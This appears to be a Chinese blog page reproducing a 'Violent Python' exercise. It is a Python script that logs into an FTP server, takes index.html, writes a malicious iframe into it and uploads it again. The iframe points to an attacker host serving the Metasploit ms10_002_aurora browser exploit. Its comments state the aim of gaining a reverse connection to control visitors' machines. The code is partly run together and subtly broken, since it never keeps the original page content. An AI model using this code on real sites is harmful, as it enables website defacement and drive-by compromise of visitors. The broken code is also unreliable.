Violent Python FTP注入

Violent Python FTP注入"/>

Violent Python FTP注入

# coding=UTF-8
# time: 18-1-5: 下午3:14 
# Author: Xifeng2009
'''
在网页中加入恶意注入代码
找到网页文件后，必须用恶意重定向代码感染它们，
为了快速创建一个位于  :8080/exploit  的恶意服务器和页面，
我们将使用Metasploit框架， 选择ms10_002_aurora
10.10.10.112:8080/exploit 上的网页会利用被重定向到这里的浏览器中的漏洞，
使之向我们提供一个反向连接，令我们能通过这个反向链接来控制这台肉鸡
'''
import ftplib'''运行代码，下载index.html，并在其中注入恶意内容，并上传'''
def injectPage(ftp, page, redirect):f = open(page + '.tmp', 'w')                              # 下载FTP文件ftp.retrlines('RETR ' + page)print("[+] Downloaded Page: " + page)f.write(redirect)                                         # 写入恶意代码f.close()print("[+] Injected Malicious IFrame on " + page)ftp.storlines('STOR ' + page, open(page + '.tmp', 'rb'))  # 上传目标文件print("[+] Uploaded Injected Page: " + page)host = '127.0.0.1'
userName = 'uftp'
passWord = 'uftp'
ftp = ftplib.FTP(host)
ftp.login(userName, passWord)
redirect = "<iframe src='http://192.168.100.113:8080/exploit'></iframe>"
injectPage(ftp, 'index.html', redirect)